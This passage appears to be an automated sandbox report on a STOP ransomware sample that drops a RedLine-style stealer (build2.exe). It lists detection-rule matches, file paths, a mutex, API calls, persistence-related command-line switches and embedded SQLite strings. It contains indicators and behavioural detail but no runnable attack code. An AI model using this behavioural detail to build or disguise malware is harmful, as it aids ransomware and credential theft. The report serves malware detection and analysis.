                Source: 00000000.00000003.1662696538.0000000003391000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000002.00000000.1666073748.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000003.00000000.1667079139.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000000.00000000.1645947470.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0000000A.00000002.1921214760.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0000000A.00000002.1921120348.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000006.00000000.1797777128.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000006.00000002.1841882825.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000006.00000000.1797319331.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0000000A.00000000.1910328345.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000003.00000000.1666987231.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000004.00000002.1746887705.0000000000633000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000002.00000000.1666176128.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 0000000A.00000000.1910389769.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000000.00000000.1646052192.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000006.00000002.1841955191.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7496, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7596, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7608, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7872, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe PID: 7256, type: MEMORYSTR, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\Temp\tmp3BC7.tmp, type: DROPPED, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\Temp\tmp3BC7.tmp, type: DROPPED, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, type: DROPPED, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, type: DROPPED, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: build2.exe.3.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: build2[1].exe.3.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engine, Classification label: mal100.rans.spre.troj.spyw.evad.winEXE@12/1265@8/5
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Code function: 0_2_00BA1900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,0_2_00BA1900
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Code function: 0_2_00BA2440 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,0_2_00BA2440
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Code function: 0_2_00B9D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,0_2_00B9D240
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\geo[1].json
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: --Admin, 0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: IsAutoStart, 0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: IsTask, 0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: --ForNetRes, 0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: --Task, 0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: --AutoStart, 0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: --Service, 0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: C:\Windows\, 0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: D:\Windows\, 0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: %username%, 0_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: F:\, 0_2_00BA9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: --Admin, 2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: IsAutoStart, 2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: IsTask, 2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: --ForNetRes, 2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: --Task, 2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: --AutoStart, 2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: --Service, 2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: X1>, 2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: x2?, 2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: x*>, 2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: C:\Windows\, 2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: D:\Windows\, 2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: 7>, 2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: %username%, 2_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: F:\, 2_2_002F9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: --Admin, 3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: IsAutoStart, 3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: IsTask, 3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: --ForNetRes, 3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: --Task, 3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: --AutoStart, 3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: --Service, 3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: C:\Windows\, 3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: D:\Windows\, 3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: %username%, 3_2_00BA9F90
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Command line argument: F:\, 3_2_00BA9F90
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe, Command line argument: tudizukedi, 4_2_00441C30
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: build2.exe, 00000005.00000002.2909786657.00000000039BF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2919066610.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: build2.exe, 00000005.00000002.2909786657.00000000039BF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2919066610.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: build2.exe, 00000005.00000002.2909786657.00000000039BF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2919066610.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: build2.exe, 00000005.00000002.2909786657.00000000039BF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2919066610.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: build2.exe, 00000005.00000002.2909786657.00000000039BF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2919066610.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                Source: build2.exe, 00000005.00000002.2909786657.00000000039BF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2919066610.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
